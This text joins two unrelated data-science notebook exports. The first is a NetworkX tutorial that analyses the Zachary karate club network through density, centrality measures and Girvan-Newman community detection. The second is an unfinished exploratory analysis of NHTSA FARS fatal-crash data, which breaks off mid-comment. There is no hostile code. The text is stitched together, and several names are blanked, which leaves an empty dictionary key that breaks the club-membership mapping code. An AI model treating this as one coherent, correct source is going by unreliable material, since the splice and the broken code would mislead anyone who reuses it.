kamada_kawai_layout, circular_layout _ = nx.draw(karate_club_net, pos, edge_color='dimgrey', node_color= "coral", with_labels=True) plt.title("Visualization of the karate club network")*Note: If you follow this tutorial, your network might look slightly different. This is because placement of nodes is not predefined--there are many different ways to visualize this network.* The visualization reveals two interesting characteristics. First, nodes differ in the number of edges--some club members have many social connections while others have few. The nodes 0, 32, and 33 stand out as members with high numbers of connections. Second, the network seems to consist of two "subgroups." One subgroup forms around node 0 and another group around nodes 32 and 33. Explore the 'Whole' Network To describe the overall structure of a network, we can use the concepts component, isolate, and density. **Components** are unconnected parts of the network, or more formally: maximal sets of nodes that can reach each other (Borgatti, Everett, & Johnson, 2003, p.16). For example, a network consisting of two components essentally is two groups of nodes with links among members of each group but no links connecting the two groups. **Isolates** are nodes that have no connections (Borgatti, Everett, & Johnson, 2003, p.14). **Density** is the proportion of edges that could exist that actually does exist. This is best understood using an example. The karate club network has 78 edges—this is the number of links that “do exist.” Imagine, every member of the club was connected to every other member--this is the number of all possible links. For an undirected network like the karate club network, this number can be calculated by *n(n-1)/2* or *'n choose 2'* with n being the number of nodes in the network. In the karate club network, this would be (34*33)/2 = 561 possible edges. Accordingly, the density is 78 / 561 = 0.139.# Number of componenents print("Original network") print("Number of components: ", nx.number_connected_components(karate_club_net)) print("Number of isolates: ", nx.number_of_isolates(karate_club_net)) print("Density: ", nx.density(karate_club_net))Original network Number of components: 1 Number of isolates: 0 Density: 0.13903743315508021The karate club network consists of one component and has no isolates. Its density is 0.139, as calculated above. This means that 13.9% of all links that could exist--if every member was connected to every other member--do actually exist. Densitiy is sometimes interpreted as the probability that an edge exists between two randomly chosen nodes of the network (see Borgatti, Everett, & Johnson, 2003, pp.150-151). Accordingly, we could say that there is a 13.9% probability that any two members of the karate club socialize outside of club activities. It is important to note that there are no standards for low or high density. What is high or low depends on the context of the analysis, particularly the tpye of connections studied. Also important to note is that density should be used with care when comparing networls of different size (for more detail see Borgatti, Everett, & Johnson, 2003, pp.150-151). Explore Individual Nodes To determine the role of an actor in a network, we use centrality measures. **Centrality measures** describe the position of a node in the network or its structural importance (Borgatti, Everett, & Johnson, 2013, p.164). We differentiate degree centrality, closeness centrality, and betweenness centrality. Figure 5 provides a schematic overview of these concepts. **Degree centrality** is the number of connections (edges) that a node has. For directed networks, we differentiate between outdegree centrality, i.e., the number of edges that start at the node, and indegree centrality, i.e., the number of edges that end at the node. Figure 5. Centrality measures for node F. Degrees can provide insights into network structures, beyond actor roles. A **degree distribution** is a histogram of the degrees of all nodes in a network. For many real world networks, the degree distribution shows a distinct pattern: *many actors* have relatively *few connections* and *few actors* have relatively *many connections*. Figure 5 shows a typical real-world network and a comparable random network. In the random network, every connection is equally likely. This leads to a degree distribution that is roughly normal. In contrast, the degree distribution of the real-world network is right skewed. This is called *power law distribution* and this type of networks are called *scale free* (for explanations on mechanisms behind this see Barabasi, 2014; Caldarelli et al., 2018; Bianconi & Barabasi, 2001). Figure 6. Degree distribution of a typical real-world network and a comparable random network. **Closeness centrality** is the sum of shortest distances (*geodesic distances*) from one node to all other nodes (, & Johnson, 2013, p.173). Put simply, we calculate for a node how many steps it would take to reach each of the other nodes, if we take the shortest path, and sum these number of steps up. Based on this calculation, higher closeness centrality means that a node is more peripheral. It is important to note that many implementations such as NetworkX rescale the measure such that higher numbers indicate a node is more central and lower numbers indicate a node is more peripheral. Finally, **betweenness centrality** is the number of shortest paths (*geodesic paths*) that pass a node. For every pair of nodes, we find the shortest path within the network. This is essentially what we did for calculating closeness centrality but this time we do it for every pair of nodes in the network. Then, a node’s betweenness centrality is the number of these paths that the node is part of. Degree, closeness, and betweenness centrality measure different characteristics of the position of a node. Let’s look at an example. Imagine, there is gossip in a network of people. A person with high degree centrality is likely to hear the gossip because there are many ways in which it can reach the person. A person with high closeness centrality (rescaled with high meaning more central) can spread gossip effectively in the network because the person is “close” to everyone. Finally, a node with high betweeness centrality can decide if the gossip reaches different parts of the network—node F in Figure 5, for example, could decide if gossip from node C ever reaches node H. Libraries differ in the implementation of these measures in terms of two key aspects: (1) The first relates to absolute vs. normalized values. Many libraries such as NetworkX normalize the measures by network size. (2) The second relates to implementation for unconnected networks (i.e., networks with more than one component). Closeness and betweeness centrality can technically not be computed for networks with multiple components because some nodes cannot reach other nodes. Many libraries such as NetworkX compute these measures for connected parts separately.# Degree centrality degree = nx.degree_centrality(karate_club_net) degree = pd.DataFrame.from_dict(degree, orient='index', columns = ["Degree centrality"]) # Turn into pd df for easier display print("Club memberss with highest degree centrality (normalized):") print(degree.sort_values("Degree centrality", ascending = False).head(5))Club memberss with highest degree centrality (normalized): Degree centrality 33 0.515152 0 0.484848 32 0.363636 2 0.303030 1 0.272727As noted above, NetworkX provides normalized centrality measures. The normalized version shows the share of other actors that a member is connected to. Hence, member 33 is connected to roughly 52% of all other actors in the network. This indicates a highly central position. To get the non-normalized degree centrality, we need to multiply the normalized degrees by *number of nodes - 1*.degree["Degree centrality"] = degree["Degree centrality"] * (nx.number_of_nodes(karate_club_net) - 1) print("\nClub memberss with highest degree centrality (absolute):") print(degree.sort_values("Degree centrality", ascending = False).head(5))Club memberss with highest degree centrality (absolute): Degree centrality 33 17.0 0 16.0 32 12.0 2 10.0 1 9.0Next, we explore the degree distribution.# Degree distribution _ = sns.distplot(degree["Degree centrality"], bins = 15) _.set_xlim(0, 20) _.set_ylabel("Frequency (in percent)") _.set_title("Degree distribution of the Karate Club Network")The degree distribution of the karate club network shows the power law distribution common for real-world network. Most club members have relatively few social connectsion and few club members have relatively many connections.# Closeness centrality closeness = nx.closeness_centrality(karate_club_net) closeness = pd.DataFrame.from_dict(closeness, orient='index', columns = ["Closeness centrality"]) # Turn into pd df for easier display print("Club members with HIGHEST closeness centrality:") print(closeness.sort_values("Closeness centrality", ascending = False).head(5)) # Betweenness centrality betweenness = nx.betweenness_centrality(karate_club_net) betweenness = pd.DataFrame.from_dict(betweenness, orient='index', columns = ["Betweenness centrality"]) # Turn into pd df for easier display print("\nClub members with highest betweenness centrality:") print(betweenness.sort_values("Betweenness centrality", ascending = False).head(5))Club members with HIGHEST closeness centrality: Closeness centrality 0 0.568966 2 0.559322 33 0.550000 31 0.540984 13 0.515625 Club members with highest betweenness centrality: Betweenness centrality 0 0.437635 33 0.304075 32 0.145247 2 0.143657 31 0.138276*Note: These are the normalized versions. Closeness centrality is rescaled such that higher numbers indicate more central positions.* The club members 0 and 33 are high on all three centrality measures. This conforms with our earlier observation based on the graph. These nodes represent the karate trainer Mr. Hi (0) and the club president . (33). The high centrality of the members across all measures and the "clustering" of the network around them is interesting. The reason likely is a conflict between Mr. Hi and as described by Zachary (1977). Zachary (1977) reports a disagreement taking place at the beginning of his observation period. Mr. Hi attempted to raise the price of karate lessons. . objected this. Over time, the club became divided over the issue. The club meeting was a central place where these differences were negotiated. Zachary explains: > *During the factional confrontations […], the club meeting remained the setting for decision making. If, at a given meeting, one faction held a majority, it would attempt to pass resolutions and decisions favorable to its ideological position. The other faction would then retaliate at a future meeting when it held the majority, by repealing the unfavorable decisions and substituting ones favorable to itself. Thus, the outcome of any crises was determined by which faction was able to 'stack' the meetings most successfully. (Zachary, 1977, p.453)*The importance of mobilizing supporters may explain the centrality of the two actors. Looking at Subgroups So far, our statement of subgroups around Mr. Hi and . is based on visual inspection of the network. This final part introduces a method to systematically identify subgroups. **Communities** are cohesive and mutually exclusive subgroups in a network (Borgatti, Everett, , 2013, p.195). A common way to detect communities is through the Girvan-Newman algorithm (see Figure 7 for a schematic overview). The algorithm systematically disconnectes the network. Edges are removed based on edge betweenness. Similar to betwenness centrality of nodes, edge betwenness measures how many shortest paths go through an edge. The algorithm iteratively removes the edge or edges with the highest edge betwenness until no edges are left. The step-wise disconnection can be shown as a dendrogram. Figure 7. Overview of Girvan-Newman algorithm. The community membership can be used as a node attribute. **Node attributes** are characteristics of nodes. They can be numerical or categorical. Examples are the sex of an actor, the sector of a corporation, the population of a country, or community in the network. Node attributes can be used in visualizations or in more advanced network models.# Applying the Girvan-Newman algorithm communities_generator = nx.community.girvan_newman(karate_club_net) print(communities_generator)NetworkX provides a generator object or "lazy iterator" that we can iterate through to see the step-wise deconnection of the network.# Show top level community print("Top level communities") print(next(communities_generator)) # Show second level community print("\nSecond level communities") print(next(communities_generator)) # Show bottom level community (leaves) print("\nBottom level communities") print(max(enumerate(communities_generator))[1])Top level communities ({0, 1, 3, 4, 5, 6, 7, 10, 11, 12, 13, 16, 17, 19, 21}, {2, 8, 9, 14, 15, 18, 20, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33}) Second level communities ({0, 1, 3, 4, 5, 6, 7, 10, 11, 12, 13, 16, 17, 19, 21}, {32, 33, 2, 8, 14, 15, 18, 20, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31}, {9}) Bottom level communities ({0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}, {10}, {11}, {12}, {13}, {14}, {15}, {16}, {17}, {18}, {19}, {20}, {21}, {22}, {23}, {24}, {25}, {26}, {27}, {28}, {29}, {30}, {31}, {32}, {33})In the first step, the network is split into two communities. The first community contains 15 and the second 19 club members. In the next step, the network is split into three communities. One communities consists of node 9 only. If we continue, we will eventually have 34 communities with every node forming its own community. NetworkX does not (yet) contain a tool to visualize community detection as dendogram. The following function creates a linkage matrix Z that can then be visualized as dendrogram using scipy. The function makes certain assumptions--hence, it needs to be used with care.# Load function def communities_linkages_matrix(communities_generator): """ Create linkages matrix Z for visualization of network communities as dendrogram using scipy.cluster.hierarchical.dendrogram. Input: communities_generator: Communities generator created by nx.community.girvan_newman Output: Linkages matrix Z as np.array Asumptions: Function works on simple structure. It assumes that every node in the dendrogram has only two children. It assumes equal distances of length 1 between subsequent nodes in the dendrogram. """ communities_list = list(reversed(list(communities_generator))) d = {} # empty dictionary t = [i for i in communities_list[0]] # leaves i = 0 # iterator for naming newly created communities h = 1 # iterator for node height, assuming equal height for pairing # Create dictionary with keys cluster and values cluster number for community in t: d[str(community)] = i i += 1 # Get linkages matrix Z Z = [] # empty list Z for j in range(1, len(communities_list)): # Find "old" communities that were merged into a "new" community old = [c for c in communities_list[j-1] if c not in communities_list[j]] new = [c for c in communities_list[j] if c not in communities_list[j-1]] # Append information to Z: Child 1, child 2, height of merger, length of new cluster Z.append([np.float(d[str(old[0])]), np.float(d[str(old[1])]), np.float(h), np.float(len(new[0]))]) # Update dictionary: Remove old clusters and add new cluster del d[str(old[0])] del d[str(old[1])] d[str(new[0])] = i # New cluster gets a new number # Update h and i h += 1 i += 1 # Add the highest level: All nodes in once cluster Z.append([np.float(list(d.values())[0]), np.float(list(d.values())[1]), np.float(h), np.float(len(communities_list[0]))]) # Turn Z into the right format Z = np.array(Z) np.flip(Z, 0) return Z # Apply function to create linkages matrix communities_generator = nx.community.girvan_newman(karate_club_net) Z = communities_linkages_matrix(communities_generator) # Plot the dendrogram usind scipy plt.figure(figsize=(10,5)) dendrogram = hierarchy.dendrogram(Z) plt.title("Dendrogram of communities for the karate club network") plt.show()The dendrogram shows two main communities, one containing Mr. Hi and the other . Each of the two communities consists of several sub-communities. Node 9 is a special case. It is not clearly associated with either of the two main communities. Let's next visualize different community solutions. The following function allows us to extract community membership as dictionary.# Function to extract community membership as dict def community_member_dict(communities_generator, num_communities): """ Get a dictionary showing community membership of nodes based on a community generator and for a specified number of communities. Input: communities_generator: Communities generator object created by nx.community.girvan_newman num_communities: Number of communities to be extracted Output: Dictionary with node as key and community as value """ partition = [x for x in list(communities_generator) if len(x) == num_communities][0] attribute_dict = {} for community in range(num_communities): for node in [node for node in partition[community]]: attribute_dict[node] = community return attribute_dictWe apply this function to extract two, three, and five community solutions. We then use the community membership as node attribute and plot the network graph with the nodes colored according to community membership.# Extract 2 communities solution and add it as node attributes communities_generator = nx.community.girvan_newman(karate_club_net) two_communities = community_member_dict(communities_generator, 2) nx.set_node_attributes(karate_club_net, two_communities, "two_communities") # Extract 3 communities solution and add it as node attributes communities_generator = nx.community.girvan_newman(karate_club_net) three_communities = community_member_dict(communities_generator, 3) nx.set_node_attributes(karate_club_net, three_communities, "three_communities") # Extract 5 communities solution and add it as node attributes communities_generator = nx.community.girvan_newman(karate_club_net) five_communities = community_member_dict(communities_generator, 5) nx.set_node_attributes(karate_club_net, five_communities, "five_communities") # Plot the networks plt.figure(figsize=(18,5)) plt.subplot(1, 3, 1) _ = nx.draw(karate_club_net, pos, edge_color='dimgrey', node_color= list(nx.get_node_attributes(karate_club_net,'two_communities').values()), with_labels=True, cmap=plt.cm.Set1) plt.title("Two communities") plt.subplot(1, 3, 2) _= nx.draw(karate_club_net, pos, edge_color='dimgrey', node_color= list(nx.get_node_attributes(karate_club_net,'three_communities').values()), with_labels=True, cmap=plt.cm.Set1) plt.title("Three communities") plt.subplot(1, 3, 3) _ = nx.draw(karate_club_net, pos, edge_color='dimgrey', node_color= list(nx.get_node_attributes(karate_club_net,'five_communities').values()), with_labels=True, cmap=plt.cm.Set1) plt.title("Five communities")C:\Users\Lena\Anaconda3\lib\site-packages\networkx\drawing\nx_pylab.py:579: MatplotlibDeprecationWarning: The iterable function was deprecated in Matplotlib 3.1 and will be removed in 3.3. Use np.iterable instead. if not cb.iterable(width):*Note: You may find the above code more complicated than code suggested in some forums. A key issue in plotting node attributes is to ensure that they are in the right order. The above code, while slightly more complicated, helps mitigate problems related to order.* As mentioned earlier, Zachary reports a conflict at the beginning of the oberservation period between (node 0) and . (node 33). This conflict effentually led to the splitting of the club and the creation of two independent organizations, one forming around and the other around . Club membership after the fission is stored as the node attribute "club". In our final graph, we will color nodes according to club membership after the fission and compare the results to our community solutions.# Inspect the node attribute "club" list(nx.get_node_attributes(karate_club_net,'club').items())[:3] # The node attribute is given as string. We need it to be a numeric value. # Create a new node attribute with the club membership being numeric club_membership = nx.get_node_attributes(karate_club_net,'club') club_dict = {'' : 0, "Officer" : 1} club_membership = {key : club_dict[value] for key, value in club_membership.items()} nx.set_node_attributes(karate_club_net, club_membership, "club_membership_numeric") # Plot the network _ = nx.draw(karate_club_net, pos, edge_color='dimgrey', node_color= list(nx.get_node_attributes(karate_club_net,'club_membership_numeric').values()), with_labels=True, cmap=plt.cm.Set1) plt.title("Club membership after fission")Project5: First Responders **Problem Satatement**First Responders want to be better prepared by the time they reach an accident site Based on vehicle information, personal data, time of day, weather conditions, how many fatalities and what level of injury severity to expect? What are the worst days/times when they should be appropriately staffed? What can be done to reduce the number of fatalities and severity of injuries? In spite of all the advances in technology, safety features - multiple airbags, collision avoidance warning lights - and better enforcement of seat-belt use, helmets for motorcycles, bicycles - the number of fatalities has been increasing over the years. Are there certain days or times of day when the fatalities are larger? **Data Source****National Highway Traffic Safety Administration’s (NHTSA) Fatality Analysis Reporting System (FARS)/Crash Report Sampling System (CRSS)** FARS contains data derived from a census of fatal motor vehicle traffic crashes in the 50 States, the District of Columbia, and Puerto Rico. To be included in FARS, a crash must involve a motor vehicle traveling on a trafficway customarily open to the public and must result in the death of at least one person (occupant of a vehicle or a non-motorist) within 30 days of the crash. FARS was conceived, designed, and developed by NHTSA’s National Center for Statistics and Analysis (NCSA) in 1975 to provide an overall measure of highway safety, to help identify traffic safety problems, to suggest solutions, and to help provide an objective basis to evaluate the effectiveness of motor vehicle safety standards and highway safety programs. **FARS data ‘dictionary’:** Fatality Analysis Reporting System (FARS) Analytical User’s Manual, 1975-2020: This multi-year analytical user’s manual provides documentation on the historical coding practices of FARS from 1975 to 2020. In other words, this manual presents the evolution of FARS coding from inception through present. The manual includes the data elements that are contained in FARS and other useful information that will enable the users to become familiar with the data system.Fatalities and Coding and Validation manual Provides more detailed definitions for each data element and attribute for a given year. US Census Bureau, Dept. of Labor, : for county population and location (latitude and longitude) data **Data summary**Downloaded FARS data from 2010-2020 (2.3 GB of data!) Each year comprised 23-36 .csv files 200+ features across all files Types of data available: Crash-level: Date/Time, GPS, Work Zone, EMS Arrival, Highway, etc. Vehicle-level: Type, Make/Model, Traveling Speed, Registration, Rollover, etc. Driver-level: Presence, License State/Zip/Status, Height, Speeding, etc. Precrash-level: Speed Limit, Roadway Grade, Distracted, Vision Obscured, etc. Person-level (MVO): Age, Sex, Seating Position, Air Bag, Ejection, etc. Person-level (NaMVO): Location, Alcohol test, Safety Equipment, etc. Automated merging of .csv files based on desired features FocusI focused on pre-crash analysis and the aident data. Precrash data analysis: PC 1-23 Dig into the following information from NHTSA's FARS data files (and corresponding csv file name) vehicle info: vehicle.csv driver's vision obscured by: vision.csv driver distracted: distract.csv driver maneuver to avoid: maneuver.csv weather at time of crash: weather.csv factors involved (tires, brakes): factor.csv Crash data is in the accident.csv file. It has data aggregated (by NHTSA) from the other files**Main areas** :1. Do EDA on pre-crash factors2. Create categories for the 99 Precrash events for better visualizations3. Create date_time index for accident4. Create 3 hour (and 2 hour and 4 hour) windows since these are the 'seasonality frequencies' for accidents and especially drunk drivers.import numpy as np import pandas as pd import matplotlib.pyplot as plt import datetime as dtGet the data from the NHTSA FARS website, extract files from the zips for years 2010-2020# Run kehinde_gather_data.ipynb first which downloads the data from the NHTSA FARS website and extracts the .zip files # into the folders by year. #folder = "FARS2020NationalCSV/" # Get data for these files for only 1 year folder = "2020_fars/" df_vehicle = pd.read_csv("./data/" + folder + "VEHICLE.CSV") df_vision = pd.read_csv("./data/" + folder + "VISION.CSV") df_distract = pd.read_csv("./data/" + folder + "DISTRACT.CSV") df_maneuver = pd.read_csv("./data/" + folder + "maneuver.CSV") df_weather = pd.read_csv("./data/" + folder + "weather.CSV") df_factor = pd.read_csv("./data/" + folder + "factor.CSV") #df_person = pd.read_csv("./data/" + folder + "PERSON.CSV") # Get accident data for all years #path = f'./data/{year}_fars/' #folderFARS = "FARS" #folderType = "NationalCSV/" folderFARS = "_fars" df_accident = pd.DataFrame() for i in range( 2010, 2021): folder_name = str(i) + folderFARS + "/" print(i, folder_name) df_accident = df_accident.append(pd.read_csv("./data/" + folder_name + "accident.CSV")) # Make column names lowercase df_vehicle.columns = df_vehicle.columns.str.lower() df_vision.columns = df_vision.columns.str.lower() df_distract.columns = df_distract.columns.str.lower() df_maneuver.columns = df_maneuver.columns.str.lower() df_weather.columns = df_weather.columns.str.lower() df_accident.columns = df_accident.columns.str.lower() df_factor.columns = df_factor.columns.str.lower() # Check all years are showing df_accident['year'].value_counts() # Reset index to sort across all years df_accident.reset_index(drop=True, inplace=True) # Keep only required columns from accident to conserve space, memory, time # C7, C17, C18, 19, C20, C24-C30...: 47 columns accident_cols = [ 'YEAR', "MONTH", "MONTHNAME", "DAY", "DAY_WEEK", "DAY_WEEKNAME", "HOUR", "HOURNAME", "MINUTE", "STATE", "STATENAME", "COUNTY", "COUNTYNAME", "ST_CASE", "VE_TOTAL", "VE_FORMS", "PVH_INVL", "PEDS", "PERSONS", "CITY", "CITYNAME", "LATITUDE", "LONGITUD", "HARM_EV", "HARM_EVNAME", "MAN_COLL", "MAN_COLLNAME", "WRK_ZONE", "WRK_ZONENAME", "REL_ROAD", "REL_ROADNAME", "LGT_COND", "LGT_CONDNAME", "WEATHER", "WEATHERNAME", "SCH_BUS", "SCH_BUSNAME", "NOT_HOUR", "NOT_HOURNAME", "NOT_MIN", "NOT_MINNAME", "ARR_HOUR", "ARR_HOURNAME", "ARR_MIN", "ARR_MINNAME", "FATALS", "DRUNK_DR"] # Convert to lower case accident_cols = [ c.lower() for c in accident_cols] # Keep only these columns df_accident = df_accident[accident_cols] df_accident.info() # 47 cols, 35MB for 3 years; 120MB for 11 years, saved half memory # Only accident (crash) is done afor all years. For remaining, just do for latest year for EDA # Precrash - from vehicle csv File # PC5-13, 17, 19-23: 15 items in vehicle.csv # Not in vehicle file: 14, 15, 16, 18 (in other .csvs) # These column names are in the XLS and as per the Validation and User Manauls # Subset columns for easier viewing cols = ["VTRAFWAY", "VNUM_LAN", "VSPD_LIM", "VALIGN", "VPROFILE", "VPAVETYP", "VSURCOND", "VTRAFCON", "VTCONT_F", "P_CRASH1", "P_CRASH2", "P_CRASH3", "PCRASH4", "PCRASH5", "ACC_TYPE"] # code column header and code name column header from XLS files (names are NOT mentioned in the manuals) cols_with_names = ["VTRAFWAY", "VTRAFWAYNAME", "VNUM_LAN", "VNUM_LANNAME", "VSPD_LIM", "VSPD_LIMNAME", "VALIGN", "VALIGNNAME", "VPROFILE", "VPROFILENAME", "VPAVETYP", "VSURCOND", "VTRAFCON", "VTCONT_F", "P_CRASH1", "P_CRASH2", "P_CRASH3", "PCRASH4", "PCRASH5", "ACC_TYPE", "ACC_TYPENAME"] # Subset of names for display purposes cols_main_names= ["VTRAFWAY", "VNUM_LAN", "VSPD_LIM", "VALIGN", "VPROFILE", "VPAVETYP", "VSURCOND", "VTRAFCON", "VTCONT_F", "P_CRASH1", "P_CRASH2", "P_CRASH2NAME", "P_CRASH3", "PCRASH4", "PCRASH5", "ACC_TYPE", "ACC_TYPENAME"] cols_veh_prev_hist = ["DEATHS", "DR_DRINK", "PREV_ACC", "PREV_ACCNAME", "PREV_SUS1", "PREV_SUS1NAME", "PREV_SUS2", "PREV_SUS2NAME", "PREV_SUS3", "PREV_SUS3NAME", "PREV_DWI", "PREV_DWINAME", "PREV_SPD", "PREV_SPDNAME", "PREV_OTH", "PREV_OTHNAME"] # Convert to lower case cols = [ c.lower() for c in cols] cols_with_names = [ c.lower() for c in cols_with_names] cols_main_names = [ c.lower() for c in cols_main_names] cols_veh_prev_hist = [ c.lower() for c in cols_veh_prev_hist] #df_accident.loc[df_accident["year"]==2020][["peds", "fatals", "persons", "ve_total"]].sum()Data Cleanup and EDAThere are many columns in this detailed dataset. Look through the obvious ones to see if there is anything obvious for further investigation.df_vehicle.loc[ df_vehicle["prev_acc"]== 98 ][["deaths", "dr_drink", "prev_dwi","prev_acc", "prev_sus1", "prev_sus2", "prev_sus3", "prev_spd" ]].sort_values(by = "prev_dwi", ascending = True).head(30) # set "prev_acc"== 98 or 99 to 0 since they don't matter for DWI # Clean up prev_accidents #df_vehicle['prev_acc'] = [0 if ((a==98) | (a==99)) else a for a in df_vehicle['prev_acc']] # Clean up prev_sus1 df_vehicle['prev_sus1'].value_counts() #69 had 1 prev underage suspension for zero-tolerance alcohol violations; 96 had 1 or more underage suspensions; 12 people had 3 or more #df_vehicle['prev_sus1'] = [0 if ((a==99) | (a==998)) else a for a in df_vehicle['prev_sus1']] # Clean up prev_sus2 df_vehicle['prev_sus2'] = [0 if ((a==99) | (a==998)) else a for a in df_vehicle['prev_sus2']] df_vehicle['prev_sus2'].value_counts() #704 had 1 prev BAC above a specified limit (not BAC violations) # Clean up prev_sus3 df_vehicle['prev_sus3'] = [0 if ((a==99) | (a==998)) else a for a in df_vehicle['prev_sus3']] df_vehicle['prev_sus3'].value_counts() #3276 had 1 prev drug violation # (1,98) are values with prior violations/DWI df_vehicle.loc[ ( df_vehicle["prev_dwi"] > 4 ) & (df_vehicle["prev_dwi"] < 99 ) ][["deaths", "dr_drink", "prev_dwi","prev_acc", "prev_sus1", "prev_sus2", "prev_sus3", "prev_spd" ]].sort_values(by = "prev_dwi", ascending = False).plot( kind="barh", title="Drivers with more than 4 previous DWI convictions"); #df_vehicle.loc[ ( df_vehicle["prev_dwi"] > 1 ) & (df_vehicle["prev_dwi"] < 99 ) ][["deaths", "dr_drink", "prev_dwi","prev_acc", "prev_sus1", # "prev_sus2", "prev_sus3", "prev_spd" ]].sort_values(by = "prev_dwi", ascending = False).plot(kind="barh") #1739 drivers had prev dwi convictions in past 5 years; ; 294 had more than 1 prior DWI; 52 had more than 2(44 deaths, ); 18 more than 3, 14 deaths; 852 drinking drivers; 1358 deaths #df_vehicle.loc[ ( df_vehicle["prev_dwi"] > 0 ) & (df_vehicle["prev_dwi"] < 99 ) ][["deaths", "dr_drink", "prev_acc", "prev_sus1", "prev_dwi" ]].sum().plot(kind="barh") # pre-crash reasons df_vehicle[["p_crash2", "p_crash2name"]].head(10) # Create categories for Pre-crash crit events. # This categorical data is much more meaningful (and useful) for modeling. ''' Values and descriptions of the categories (matches the Manuals) 1 This Vehicle Loss of Control Due to: 2 This Vehicle Traveling 3 Other Motor Vehicle in Lane 4 Other Motor Vehicle Encroaching into Lane 5 Pedestrian or Pedalcyclist or Other Non-Motorist 6 Object or Animal 7 Other 9 Unknown ''' for i in range( df_vehicle.shape[0]): e = df_vehicle.loc[i, 'p_crash2'] #print( {i}, {e}) if e >=1 and e <= 9: df_vehicle.loc[i, 'crit_event_category'] = 1 df_vehicle.loc[i, 'crit_event_cat_name'] = "This lost control" elif e >=10 and e <= 21: df_vehicle.loc[i, 'crit_event_category'] = 2 df_vehicle.loc[i, 'crit_event_cat_name'] = "This traveling" elif e >=50 and e <= 59: df_vehicle.loc[i, 'crit_event_category'] = 3 df_vehicle.loc[i, 'crit_event_cat_name'] = "Other Motor Vehicle in Lane" elif e >=60 and e <= 78: df_vehicle.loc[i, 'crit_event_category'] = 4 df_vehicle.loc[i, 'crit_event_cat_name'] = "Other Motor Vehicle Encroaching into Lane" elif e >=80 and e <= 85: df_vehicle.loc[i, 'crit_event_category'] = 5 df_vehicle.loc[i, 'crit_event_cat_name'] = "Pedestrian or Pedalcyclist or Other Non-Motorist" elif e >=87 and e <= 92: df_vehicle.loc[i, 'crit_event_category'] = 6 df_vehicle.loc[i, 'crit_event_cat_name'] = "Object or Animal" elif e == 98: df_vehicle.loc[i, 'crit_event_category'] = 7 df_vehicle.loc[i, 'crit_event_cat_name'] = "Other" else: #e == 99: df_vehicle.loc[i, 'crit_event_category'] = 9 df_vehicle.loc[i, 'crit_event_cat_name'] = "Unknown" #print( i, e, df_vehicle.loc[i, 'crit_event_category'], df_vehicle.loc[i, 'crit_event_cat_name']) # This takes a minute to run, even for 54k records # Check the mapping from event to category is done properly #df_vehicle[["crit_event_category", "p_crash2"]].head(20) df_vehicle[["p_crash2", "crit_event_cat_name", "crit_event_category"]].head(20) # Plot the critical categories plt.figure( figsize=(4,4)); df_vehicle["crit_event_cat_name"].value_counts(normalize = True, ascending=True).plot(kind="barh", title="All Precrash Critical Categories"); plt.xlabel("Proportion of each category"); plt.ylabel("Precrash category"); # Plot all the Precrash events. Showing both the event code and number for easier comparison plt.figure( figsize=(10,12)) df_vehicle[["p_crash2", "p_crash2name"]].value_counts(normalize=True, ascending=True).plot(kind="barh", title="All Pre-crash Critical Events"); plt.xlabel("Proportion of each critical event", fontsize=12); plt.ylabel("Precrash critical event", fontsize=12); df_vehicle[["vsurcond", "vsurcondname"]].value_counts(normalize=True)*100 # This might be interesting for further deep dive. Wet conditions: 11%, Entering a trafficway or was in Driveway: 0.8%, Ice 0.6%, # Plot all the roadway surface conditions. Showing both the event code and number for easier comparison plt.figure( figsize=(6,4)) df_vehicle[["vsurcond", "vsurcondname"]].value_counts(normalize=True, ascending=True).plot(kind="barh", title="Roadway surface condition prior to Critical Precrash Event"); plt.xlabel("Proportion of each critical event", fontsize=12); plt.ylabel("Roadway surface condition", fontsize=12); # Now check if drivers vison was obscured from vision df df_vision.info() df_vision[["vision", "visionname"]].value_counts(normalize=True)*100 # Plot. Showing both the event code and number for easier comparison plt.figure( figsize=(6,4)) df_vision[["vision", "visionname"]].value_counts( ascending=True).plot(kind="barh", title="Driver's Vision Obscured By"); plt.xlabel("Number of each event", fontsize=12); plt.ylabel("Obscured By", fontsize=12); # Check if Driver was distracted df_distract[["drdistract", "drdistractname"]].value_counts(normalize=True)*100 # The thing(s) the driver attempted to avoid while the vehicle was on the road portion of the trafficway, # just prior to the first harmful event for this vehicle. #PC15. Maneuver.MANEUVER df_maneuver[["maneuver", "maneuvername"]].value_counts(normalize=True)*100 # PC4 - Contributing Circumstances, Motor Vehicle # Factor.VEHICLECC df_factor[["vehiclecc", "vehicleccname"]].value_counts(normalize=True)*100 # Tires contribute 1.1% to all fatal accidents! # What was the weather when the crash occured df_weather[["weather", "weathername"]].value_counts(normalize=True)*100Done with basic investigation of the pre-crash reasons. Now let's look at accident data# number of fatals. None of the records have zero fatals - i.e. the dataset ONLY contains accidents with at least one fatality df_accident['fatals'].value_counts() # Construction/Work zones df_accident[["wrk_zone", "wrk_zonename"]].value_counts(normalize=True)*100 #LGT_COND df_accident[["lgt_cond", "lgt_condname"]].value_counts(normalize=True)*100 #WEATHER df_accident[["weather", "weathername"]].value_counts(normalize=True)*100 #"REL_ROAD", "REL_ROADNAME" df_accident[["rel_road", "rel_roadname"]].value_counts(normalize=True)*100 # accidents per hour. No major standouts here. Hence we will break this up into chunks of multiple hours. df_accident['hour'].value_counts(normalize=True) # Create datetime column. # This is the timeseries index used in modeling # Unfortunately, we cannot use the standard pd.to_datetime functions since the FARS data has values of 98 and 99 which are considered # valid values and mess up the calculations. # df_accident["date_time"] = pd.to_datetime(df_accident[["year", "month", "day", "hour", "minute"]], errors='coerce') # If hour = 99 or minute = 99 -> set to NaT, equivalent of NaN. We'll drop these rows later for i in range (df_accident.shape[0]) : d = df_accident.iloc[i] if (d['hour'] < 99) & (d['minute'] < 99): # valid values dt = str(d["year"]) + "-" + str( d["month"]) + "-" + str( d["day"]) + " " + str( d["hour"]) + ":" + str( d["minute"]) #print( i, dt ) df_accident.loc[i, "date_time"] = pd.to_datetime(dt) else: # don't create an entry if invalid hour or minute?? df_accident.loc[i, "date_time"] = pd.NaT # NaT is the equivalent of NaN for datetime #print( i, d ) # takes 10 minutes for 10 years #df_accident df_accident[['year', "month", "day", "hour", "minute"]] df_accident["date_time"].isnull().sum() # 315 have null (NaT) in 2020; 787 in 2018-2020; 2618 in 10 years. # Less than 1% so can drop these rows # Drop the nulls first before using this as the index. (Keep the nonnulls) df_accident = df_accident.loc[df_accident["date_time"].notnull()] # confirm no nulls for date_time df_accident.isnull().sum() df_accident["date_time"].isnull().sum() # finally, no 